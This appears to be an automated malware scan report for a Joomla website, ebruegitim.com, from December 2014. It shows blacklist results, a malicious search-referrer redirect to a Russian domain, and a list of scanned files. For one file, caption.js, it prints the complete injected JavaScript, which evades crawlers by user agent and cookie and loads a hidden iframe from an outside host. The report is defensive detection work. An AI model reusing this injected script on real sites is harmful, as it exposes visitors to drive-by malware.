Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ebruegitim.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ebruegitim.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://ebruegitim.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ebruegitim.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 20:29:39 GMT Location: http://moi-supas.ru/blackmuscats?5 Server: Apache Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://ebruegitim.com/ | 200 OK Content-Length: 24122 Content-Type: text/html | clean |
http://ebruegitim.com/media/system/js/caption.js | 200 OK Content-Length: 970 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="100" height="120" style="position:absolute;margin-top:-1000px;" src="http://carsonpestcontrol.ml/storeuse17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://ebruegitim.com/index.php | 200 OK Content-Length: 24122 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?view=article&catid=34:sabit-yazlar&id=57:ebru-eitim-merkezi&format=pdf | 200 OK Content-Length: 240245 Content-Type: application/pdf | clean |
http://ebruegitim.com/test404page.js | 404 Not Found Content-Length: 395 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?view=article&catid=34:sabit-yazlar&id=57:ebru-eitim-merkezi&tmpl=component&print=1&layout=default&page= | 200 OK Content-Length: 3447 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL2VicnVlZ2l0aW0uY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTU3OmVicnUtZWl0aW0tbWVya2V6aSZjYXRpZD0zNDpzYWJpdC15YXpsYXI= | 200 OK Content-Length: 4030 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?view=article&catid=34:sabit-yazlar&id=58:profesyonel-yaklam-ekonomik-coezuem&format=pdf | 200 OK Content-Length: 240235 Content-Type: application/pdf | clean |
http://ebruegitim.com/index.php?view=article&catid=34:sabit-yazlar&id=58:profesyonel-yaklam-ekonomik-coezuem&tmpl=component&print=1&layout=default&page= | 200 OK Content-Length: 3748 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL2VicnVlZ2l0aW0uY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTU4OnByb2Zlc3lvbmVsLXlha2xhbS1la29ub21pay1jb2V6dWVtJmNhdGlkPTM0OnNhYml0LXlhemxhcg== | 200 OK Content-Length: 4054 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?view=article&catid=34:sabit-yazlar&id=59:uzman-eitim-kadrosu&format=pdf | 200 OK Content-Length: 240119 Content-Type: application/pdf | clean |
http://ebruegitim.com/index.php?view=article&catid=34:sabit-yazlar&id=59:uzman-eitim-kadrosu&tmpl=component&print=1&layout=default&page= | 200 OK Content-Length: 3316 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL2VicnVlZ2l0aW0uY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTU5OnV6bWFuLWVpdGltLWthZHJvc3UmY2F0aWQ9MzQ6c2FiaXQteWF6bGFy | 200 OK Content-Length: 4030 Content-Type: text/html | clean |
http://ebruegitim.com/index.php?option=com_user&view=reset | 200 OK Content-Length: 13094 Content-Type: text/html | clean |
http://ebruegitim.com/media/system/js/validate.js | 200 OK Content-Length: 274 Content-Type: application/javascript | clean |